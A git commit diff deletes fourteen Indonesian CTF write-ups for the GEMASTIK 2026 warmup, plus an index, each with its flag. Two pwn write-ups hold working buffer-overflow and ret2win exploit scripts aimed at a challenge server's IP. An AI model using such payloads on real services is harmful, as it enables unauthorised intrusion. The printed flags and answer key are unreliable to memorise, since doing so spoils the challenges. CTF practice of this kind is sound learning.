chore: gitignore content/ .md files, remove from git tracking
CI / typecheck + build (push) Canceled after 0s
CI / deploy to VPS (push) Canceled after 0s

DB is the source of truth via MCP API. Filesystem .md files
are auto-generated backups, not tracked in git. The git-sync
webhook is secondary — content is created/updated via
create_document/update_document MCP tools (DB-first).
This commit is contained in:
asepharyana
2026-08-21 14:33:20 +07:00
parent 0de2458955
commit 87ce3ebbc6
15 changed files with 0 additions and 691 deletions
@@ -1,58 +0,0 @@
---
title: "GEMASTIK 2026 Warmup — All Chapters"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "writeup-index"]
path: "writeups/gemastik-2026-warmup/_index.md"
created_at: "2026-08-21T07:17:48.670Z"
updated_at: "2026-08-21T07:17:48.670Z"
---
---
title: "GEMASTIK 2026 Warmup — All Chapters"
event: "GEMASTIK 2026 Warmup"
category: "index"
points: 0
difficulty: "index"
---
# GEMASTIK 2026 Warmup — Chapter Index (ch1–ch14)
**Platform:** [Warmup GEMASTIK 2026](https://warmup-cybersecurity.apps.binus.ac.id) (CTFd)
**Status:** 14/14 solved — 7001 points (13×500 + 1×501)
| # | Challenge | Category | Diff | Flag |
|---|-----------|----------|------|------|
| 1 | Sixty Four | Encoding | easy | `GEMASTIK19{b4s3_s1xty_f0ur_warm1ng_up}` |
| 2 | Julius | Caesar/ROT13 | easy | `GEMASTIK19{caesar_r0t_th1rt33n_klasik}` |
| 3 | Needle | Forensics/strings | easy | `GEMASTIK19{str1ngs_c4n_f1nd_m3}` |
| 4 | Say Cheese | EXIF metadata | easy | `GEMASTIK19{h1dd3n_1n_m3tadata_exif}` |
| 5 | Nothing Here | Web comment | easy | `GEMASTIK19{v13w_s0urc3_pahlawan}` |
| 6 | Sweet Cookie | Web/cookie | easy | `GEMASTIK19{c00k13_b4s3_d3c0d3}` |
| 7 | Open Book | Source | easy | `GEMASTIK19{pyth0n_s0urc3_t3rbuka}` |
| 8 | Back and Forth | XOR | easy | `GEMASTIK19{x0r_it_back_4gain}` |
| 9 | Are You Admin? | Pwn/bof | easy | `GEMASTIK19{0v3rfl0w_ubah_var}` |
| 10 | Call Me | Pwn/ret2win | easy | `GEMASTIK19{r3t2w1n_l0mpat_k3_win}` |
| 11 | Behind the Picture | PNG stego | easy | `GEMASTIK19{c4t_g4mbar_ada_flag}` |
| 12 | Layers | Hex→B64 chain | easy | `GEMASTIK19{h3x_lQlu_b4s3_ch41n}` |
| 13 | Slopped | RSA small factors | medium | `GEMASTIK19{qu4ntum_c0mput3r_br0k3_rs4_y0u_sh0uld_us3_p4p3r_s34rch_mcp_sk1ll}` |
| 14 | Slopped wave-2 | RSA paper search | hard | `GEMASTIK19{test_vector_of_listP_on_quant}` |
### Ringkasan Metode
| Ch | Metode | Tool |
|----|--------|------|
| 1 | Double Base64 | base64 -d ×2 |
| 2 | ROT13 Caesar | codecs.encode(s, "rot_13") |
| 3 | strings | strings secret.bin |
| 4 | EXIF metadata | strings photo.jpg |
| 5 | HTML comment | curl \| grep '<!--' |
| 6 | Base64 cookie | base64 -d |
| 7 | ASCII codes | chr() decoding |
| 8 | Single-byte XOR | XOR 0x42 |
| 9 | Stack overflow | buffer > admin |
| 10 | ret2win + align | ROP chain |
| 11 | PNG strings | strings kucing.png |
| 12 | Hex→Base64 | bytes.fromhex + b64decode |
| 13 | RSA small factors | trial division / sympy factorint |
| 14 | RSA special integers | GCD with paper appendix primes |
@@ -1,50 +0,0 @@
---
title: "Sixty Four — Double Base64"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "crypto"]
path: "writeups/gemastik-2026-warmup/ch1-sixty-four.md"
created_at: "2026-08-21T07:25:17.079Z"
updated_at: "2026-08-21T07:25:17.079Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Sixty Four — Double Base64"
category: "crypto"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{b4s3_s1xty_f0ur_warm1ng_up}"
---
# Sixty Four (500 pts) — Encoding
**File:** `chall.txt` → `UjBWTlFWTlVTVXN4T1h0aU5ITXpYM014ZUhSNVgyWXdkWEpmZDJGeWJURnVaMTkxY0gwPQ==`
Teks di-encode **Base64 dua kali** (hint: "sixty four" = base64). Decode berlapis:
```bash
$ echo "UjBWTlFWTlVTVXN4T1h0aU5ITXpYM014ZUhSNVgyWXdkWEpmZDJGeWJURnVaMTkxY0gwPQ==" | base64 -d
R0VNQVNUSUsxOXtiNHMzX3MxeHR5X2YwdXJfd2FybTFuZ191cH0=
$ echo "R0VNQVNUSUsxOXtiNHMzX3MxeHR5X2YwdXJfd2FybTFuZ191cH0=" | base64 -d
GEMASTIK19{b4s3_s1xty_f0ur_warm1ng_up}
```
## Solusi Python
```python
import base64
with open("chall.txt") as f:
s = f.read().strip()
# First base64 decode
decoded1 = base64.b64decode(s)
# Second base64 decode
flag = base64.b64decode(decoded1).decode()
print(f"Flag: {flag}")
# Output: GEMASTIK19{b4s3_s1xty_f0ur_warm1ng_up}
```
## Flag
`GEMASTIK19{b4s3_s1xty_f0ur_warm1ng_up}`
@@ -1,62 +0,0 @@
---
title: "Call Me — ret2win"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "pwn"]
path: "writeups/gemastik-2026-warmup/ch10-call-me.md"
created_at: "2026-08-21T07:25:43.282Z"
updated_at: "2026-08-21T07:25:43.282Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Call Me — ret2win"
category: "pwn"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{r3t2w1n_l0mpat_k3_win}"
---
# Call Me (500 pts) — Pwn / ret2win
**Server:** `nc 15.232.89.109 9002`
**Source (`chall.c`):**
```c
void win() { system("/bin/sh"); } // flag printed inside
char buf[32];
gets(buf); // <-- overflow
```
## Eksploitasi
1. Compile lokal untuk dapatkan alamat `win()`:
```bash
gcc -fno-stack-protector -no-pie -o ch10 chall.c
nm ch10 | grep win
# 00000000004011f6 T win
```
2. Overflow `buf[32]` lalu timpa return address dengan alamat `win()` (0x4011f6).
Sisipkan satu `ret` gadget (0x401016) untuk realign RSP agar `movaps` di `win`/`printf` tidak segfault:
```python
import socket, time, struct
s = socket.socket()
s.connect(("15.232.89.109", 9002))
time.sleep(0.5)
RET_GADGET = 0x401016 # alignment
WIN_ADDR = 0x4011f6
payload = b"A" * 32 + b"B" * 8 + struct.pack("<Q", RET_GADGET) + struct.pack("<Q", WIN_ADDR)
s.sendall(payload + b"\n")
time.sleep(1.5)
print(s.recv(4096).decode())
# -> GEMASTIK19{r3t2w1n_l0mpat_k3_win}
```
## Flag
`GEMASTIK19{r3t2w1n_l0mpat_k3_win}`
@@ -1,31 +0,0 @@
---
title: "Behind the Picture — PNG Strings"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "forensics"]
path: "writeups/gemastik-2026-warmup/ch11-behind-the-picture.md"
created_at: "2026-08-21T07:25:45.672Z"
updated_at: "2026-08-21T07:25:45.672Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Behind the Picture — PNG Strings"
category: "forensics"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{c4t_g4mbar_ada_flag}"
---
# Behind the Picture (500 pts) — Steganografi / PNG
**File:** `kucing.png` (cat image)
Flag disisipkan sebagai string di dalam file PNG (bisa dilihat dengan `strings`):
```bash
strings kucing.png | grep GEMASTIK
# GEMASTIK19{c4t_g4mbar_ada_flag}
```
## Flag
`GEMASTIK19{c4t_g4mbar_ada_flag}`
@@ -1,41 +0,0 @@
---
title: "Layers — Hex to Base64 Chain"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "crypto"]
path: "writeups/gemastik-2026-warmup/ch12-layers.md"
created_at: "2026-08-21T07:25:48.559Z"
updated_at: "2026-08-21T07:25:48.559Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Layers — Hex to Base64 Chain"
category: "crypto"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{h3x_lQlu_b4s3_ch41n}"
---
# Layers (500 pts) — Encoding chain
**File:** `chall.txt` → `5230564e51564e55535573784f58746f4d33686662464673645639694e484d7a58324e6f4e44467566513d3d`
Dua lapis encoding berturut-turut: **Hex → bytes → Base64 → flag**:
```python
import base64
s = "5230564e51564e55535573784f58746f4d33686662464673645639694e484d7a58324e6f4e44467566513d3d"
# Layer 1: hex decode
b = bytes.fromhex(s)
# b = b'R0VNQVNUSUsxOXtoM3hfbFFsdV9iNHMzX2NoNDFufQ=='
# Layer 2: base64 decode
flag = base64.b64decode(b).decode()
print(flag)
# GEMASTIK19{h3x_lQlu_b4s3_ch41n}
```
## Flag
`GEMASTIK19{h3x_lQlu_b4s3_ch41n}`
@@ -1,67 +0,0 @@
---
title: "Slopped — RSA Small Factors"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "crypto"]
path: "writeups/gemastik-2026-warmup/ch13-slopped.md"
created_at: "2026-08-21T07:26:21.304Z"
updated_at: "2026-08-21T07:26:21.304Z"
category: "crypto"
challenge: "Slopped"
difficulty: "medium"
event: "GEMASTIK 2026 Warmup"
flag: "GEMASTIK19{qu4ntum_c0mput3r_br0k3_rs4_y0u_sh0uld_us3_p4p3r_s34rch_mcp_sk1ll}"
points: 500
---
# Slopped (500 pts) — Crypto / RSA small factors
**File:** `chall.py`
```python
import random
p = random.randint(1, 10**4) # tiny prime candidates
q = random.randint(1, 10**4)
# ... find small primes, multiply
n = p * q * (big prime)
e = 0x10001
c = pow(flag, e, n)
```
## Analisis
RSA dengan `e = 0x10001`, `n` 2048-bit, `c = pow(flag, e, n)`.
`n` dibangun dari **faktor prima kecil** (sloppy primes — "my AI broke RSA with
1 billion qubits"). Faktorisasi temukan prima kecil lewat trial division, lalu `phi = prod(p_i - 1)`, `d = e⁻¹ mod phi`, dan `m = pow(c, d, n)`.
## Solusi
```python
from Crypto.Util.number import long_to_bytes
from sympy import factorint
e = 0x10001
n = 0xdb... # 2048-bit modulus
c = 0x...
factors = factorint(n)
print(factors)
# {83: 1, 233: 1, 9679: 1, <big_prime>: 1}
phi = 1
for p, exp in factors.items():
phi *= (p - 1) * p**(exp - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# GEMASTIK19{qu4ntum_c0mput3r_br0k3_rs4_y0u_sh0uld_us3_p4p3r_s34rch_mcp_sk1ll}
```
## Flag
`GEMASTIK19{qu4ntum_c0mput3r_br0k3_rs4_y0u_sh0uld_us3_p4p3r_s34rch_mcp_sk1ll}`
> Flag ini adalah petunjuk untuk ch14 (paper search).
@@ -1,88 +0,0 @@
---
title: "Slopped wave-2 — RSA Special Integers (Paper Search)"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "crypto"]
path: "writeups/gemastik-2026-warmup/ch14-slopped-wave2.md"
created_at: "2026-08-21T07:25:51.729Z"
updated_at: "2026-08-21T07:25:51.729Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Slopped wave-2 — RSA Special Integers (Paper Search)"
category: "crypto"
points: 501
difficulty: "hard"
flag: "GEMASTIK19{test_vector_of_listP_on_quant}"
---
# Slopped wave-2 (501 pts) — Crypto / RSA "special integers"
**File:** `chals.py` — Kategori: `crypto, misc`
## Challenge
```python
p = #### (hidden_length)
q = #### (hidden_length)
n = p * q
print(n)
e = 0x10001
p = bytes_to_long(b'GEMASTIK19{...}') # flag hijacked as 'p'
c = pow(p, e, n)
print(c)
```
`c = pow(p, e, n)` dengan `p = bytes_to_long(flag)`, `e = 0x10001`, `n` 2048-bit.
## Analisis Serangan
Semua serangan standar gagal:
- **Fermat** (close primes): gap > 1.2×10^159
- **ECM**: tidak smooth (B1=43M)
- **Pollard p-1**: B=2M — tidak smooth
- **ROCA**: n mod M bukan pangkat 65537
- **Wiener / Boneh-Durfee**: e kecil berarti d besar
- **Trial division** ke 10M: bersih
### Hint "paper search"
Hint dari ch13 ("you should use paper search mcp skill") mengarah ke paper akademik.
Paper: **[Wang et al., "A First Successful Factorization of RSA-2048 Integer by D-Wave Quantum Computer (TST 2024.9010028)"](https://www.sciopen.com/article/10.26599/TST.2024.9010028)**.
Paper mendefinisikan **"special integer"**: `n = p·q` di mana kedua prima berbeda tepat 2 bit (`popcount(p XOR q) = 2`). Appendix Table S1 berisi 10 contoh (N, p, q) yang **menggunakan kembali prima yang sama** — inilah "sloppiness" wave-2: modulus challenge merekonstruksi ulang dua prima dari dua contoh berbeda.
## Solusi
Hitung `gcd(n, P_i)` untuk setiap prima `P_i` di 10 contoh paper:
```python
import math
from Crypto.Util.number import long_to_bytes
n = <2048-bit modulus from challenge>
e = 0x10001
c = <ciphertext>
# 10 contoh dari appendix paper, setiap contoh punya (p, q)
paper_examples = [...]
for ex in paper_examples:
for P in (ex.p, ex.q):
g = math.gcd(n, int(P))
if 1 < g < n:
p_factor = g
q_factor = n // g
break
phi = (p_factor - 1) * (q_factor - 1)
d = pow(e, -1, phi)
flag = pow(c, d, n)
print(long_to_bytes(flag))
# GEMASTIK19{test_vector_of_listP_on_quant}
```
## Flag
`GEMASTIK19{test_vector_of_listP_on_quant}`
@@ -1,36 +0,0 @@
---
title: "Julius — ROT13 Caesar Cipher"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "crypto"]
path: "writeups/gemastik-2026-warmup/ch2-julius.md"
created_at: "2026-08-21T07:25:20.120Z"
updated_at: "2026-08-21T07:25:20.120Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Julius — ROT13 Caesar Cipher"
category: "crypto"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{caesar_r0t_th1rt33n_klasik}"
---
# Julius (500 pts) — Caesar / ROT13
**File:** `chall.txt` → `TRZNFGVX19{pnrfne_e0g_gu1eg33a_xynfvx}`
Caesar cipher dengan pergeseran paling populer di internet = **ROT13** (geser 13).
`TRZNFGVX19` → `GEMASTIK19`, dst.
```python
import codecs
s = "TRZNFGVX19{pnrfne_e0g_gu1eg33a_xynfvx}"
flag = codecs.encode(s, "rot_13")
print(f"Flag: {flag}")
# Output: GEMASTIK19{caesar_r0t_th1rt33n_klasik}
```
## Flag
`GEMASTIK19{caesar_r0t_th1rt33n_klasik}`
@@ -1,31 +0,0 @@
---
title: "Needle — Strings Binary"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "forensics"]
path: "writeups/gemastik-2026-warmup/ch3-needle.md"
created_at: "2026-08-21T07:25:23.053Z"
updated_at: "2026-08-21T07:25:23.053Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Needle — Strings Binary"
category: "forensics"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{str1ngs_c4n_f1nd_m3}"
---
# Needle (500 pts) — Steganografi / Binary
**File:** `secret.bin` (748 bytes, binary)
Teks tersembunyi di antara "junk data". Cukup ekstrak **strings** yang printable:
```bash
strings secret.bin | grep GEMASTIK
# GEMASTIK19{str1ngs_c4n_f1nd_m3}
```
## Flag
`GEMASTIK19{str1ngs_c4n_f1nd_m3}`
@@ -1,31 +0,0 @@
---
title: "Say Cheese — EXIF Metadata"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "forensics"]
path: "writeups/gemastik-2026-warmup/ch4-say-cheese.md"
created_at: "2026-08-21T07:25:25.953Z"
updated_at: "2026-08-21T07:25:25.953Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Say Cheese — EXIF Metadata"
category: "forensics"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{h1dd3n_1n_m3tadata_exif}"
---
# Say Cheese (500 pts) — Steganografi / Metadata
**File:** `photo.jpg`
Flag disimpan di **metadata EXIF** foto. Cek dengan `exiftool` / `strings`:
```bash
strings photo.jpg | grep GEMASTIK
# GEMASTIK19{h1dd3n_1n_m3tadata_exif}
```
## Flag
`GEMASTIK19{h1dd3n_1n_m3tadata_exif}`
@@ -1,36 +0,0 @@
---
title: "Nothing Here — Web Comment"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "web"]
path: "writeups/gemastik-2026-warmup/ch5-nothing-here.md"
created_at: "2026-08-21T07:25:28.880Z"
updated_at: "2026-08-21T07:25:28.880Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Nothing Here — Web Comment"
category: "web"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{v13w_s0urc3_pahlawan}"
---
# Nothing Here (500 pts) — Web
**URL:** `http://15.232.89.109:8001/`
Halaman bilang "tidak ada apa-apa" tapi flag ada di **HTML comment**:
```html
<!-- Catatan dev: jangan lupa hapus flag ini sebelum rilis: GEMASTIK19{v13w_s0urc3_pahlawan} -->
```
## Recon
```bash
curl -s http://15.232.89.109:8001/ | grep -i 'GEMASTIK\|<!--'
```
## Flag
`GEMASTIK19{v13w_s0urc3_pahlawan}`
@@ -1,36 +0,0 @@
---
title: "Sweet Cookie — Base64 Cookie"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "web"]
path: "writeups/gemastik-2026-warmup/ch6-sweet-cookie.md"
created_at: "2026-08-21T07:25:31.627Z"
updated_at: "2026-08-21T07:25:31.627Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Sweet Cookie — Base64 Cookie"
category: "web"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{c00k13_b4s3_d3c0d3}"
---
# Sweet Cookie (500 pts) — Web
**URL:** `http://15.232.89.109:8002/`
Server mengirim cookie `session`. Nilainya cuma di-encode **Base64** (JSON):
```python
import base64
# Cookie value from Set-Cookie header
cookie = "eyJ1c2V..." # nilai session cookie
decoded = base64.b64decode(cookie)
print(decoded)
# {"user": "guest", "flag": "GEMASTIK19{c00k13_b4s3_d3c0d3}"}
```
## Flag
`GEMASTIK19{c00k13_b4s3_d3c0d3}`
@@ -1,35 +0,0 @@
---
title: "Open Book — Python Source"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "misc"]
path: "writeups/gemastik-2026-warmup/ch7-open-book.md"
created_at: "2026-08-21T07:25:34.522Z"
updated_at: "2026-08-21T07:25:34.522Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Open Book — Python Source"
category: "misc"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{pyth0n_s0urc3_t3rbuka}"
---
# Open Book (500 pts) — Misc / Source
**File:** `chall.py`
Password yang benar **langsung dicetak dari array `SECRET`** (ASCII codes):
```python
SECRET = [71, 69, 77, 65, 83, 84, 73, 75, 49, 57, 123, 112, 121, 116, 104, 48, 110, 95,
115, 48, 117, 114, 99, 51, 95, 116, 51, 114, 98, 117, 107, 97, 125]
flag = "".join(chr(c) for c in SECRET)
print(flag)
# GEMASTIK19{pyth0n_s0urc3_t3rbuka}
```
## Flag
`GEMASTIK19{pyth0n_s0urc3_t3rbuka}`
@@ -1,36 +0,0 @@
---
title: "Back and Forth — XOR"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "reverse"]
path: "writeups/gemastik-2026-warmup/ch8-back-and-forth.md"
created_at: "2026-08-21T07:25:37.394Z"
updated_at: "2026-08-21T07:25:37.394Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Back and Forth — XOR"
category: "reverse"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{x0r_it_back_4gain}"
---
# Back and Forth (500 pts) — Reversing / XOR
**File:** `chall.c`
Flag di-XOR dengan kunci 1-byte `0x42`. Balikkan dengan XOR lagi:
```python
enc = [0x05, 0x07, 0x0f, 0x03, 0x11, 0x16, 0x0b, 0x09, 0x73, 0x7b, 0x39, 0x3a,
0x72, 0x30, 0x1d, 0x2b, 0x36, 0x1d, 0x20, 0x23, 0x21, 0x29, 0x1d, 0x76,
0x25, 0x23, 0x2b, 0x2c, 0x3f]
flag = "".join(chr(b ^ 0x42) for b in enc)
print(flag)
# GEMASTIK19{x0r_it_back_4gain}
```
## Flag
`GEMASTIK19{x0r_it_back_4gain}`
@@ -1,53 +0,0 @@
---
title: "Are You Admin? — Buffer Overflow"
type: "writeup"
section: "writeups"
status: "published"
author: "asep"
tags: ["gemastik", "ctf", "warmup", "pwn"]
path: "writeups/gemastik-2026-warmup/ch9-are-you-admin.md"
created_at: "2026-08-21T07:25:39.978Z"
updated_at: "2026-08-21T07:25:39.978Z"
event: "GEMASTIK 2026 Warmup"
challenge: "Are You Admin? — Buffer Overflow"
category: "pwn"
points: 500
difficulty: "easy"
flag: "GEMASTIK19{0v3rfl0w_ubah_var}"
---
# Are You Admin? (500 pts) — Pwn / Buffer Overflow
**Server:** `nc 15.232.89.109 9001`
**Source (`chall.c`):**
```c
volatile int admin = 0;
char name[16];
gets(name); // <-- overflow, no bounds check
if (admin != 0) { /* print flag */ }
```
## Eksploitasi
Stack layout: `name[16]` diikuti oleh `admin` (int). Overflow `name` dengan padding 20 byte
lalu 4 byte nonzero untuk mengubah `admin` menjadi != 0:
```python
import socket, time
s = socket.socket()
s.connect(("15.232.89.109", 9001))
time.sleep(0.5)
# 16 bytes buf + 4 bytes padding + 4 bytes admin override
payload = b"A" * 20 + b"\xff\xff\xff\xff"
s.sendall(payload + b"\n")
time.sleep(1.2)
print(s.recv(4096).decode())
# -> GEMASTIK19{0v3rfl0w_ubah_var}
```
## Flag
`GEMASTIK19{0v3rfl0w_ubah_var}`